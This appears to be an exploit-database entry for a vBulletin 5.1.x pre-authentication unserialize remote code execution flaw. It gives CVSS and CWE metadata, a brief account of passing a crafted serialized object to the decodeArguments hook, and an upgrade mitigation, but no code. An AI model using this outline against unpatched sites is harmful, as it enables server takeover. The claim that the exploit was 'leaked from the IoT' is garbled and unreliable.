vendor: Vbulletin
by: hhjj
CVSS: 9.8 (HIGH)
CWE: 502 (Unserialize)
Product Name: Vbulletin
Affected Version From: 5.1.x
Affected Version To: 5.1.x
Patch Exists: Yes
Related CWE: N/A
CPE: a:vbulletin:vbulletin
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Debian
2015
Vbulletin 5.1.X unserialize 0day preauth RCE exploit
This exploit is a 0day preauth RCE exploit for Vbulletin 5.1.X. It was leaked from the IoT and allows an attacker to execute arbitrary code on the vulnerable system. The exploit works by building an object that carries a malicious function and encoding it with urlencode and serialize. The encoded object is then passed to the decodeArguments API hook, which unserializes it and executes the malicious function, so no authentication is required.
Mitigation:
The best way to mitigate this vulnerability is to upgrade to the latest version of Vbulletin.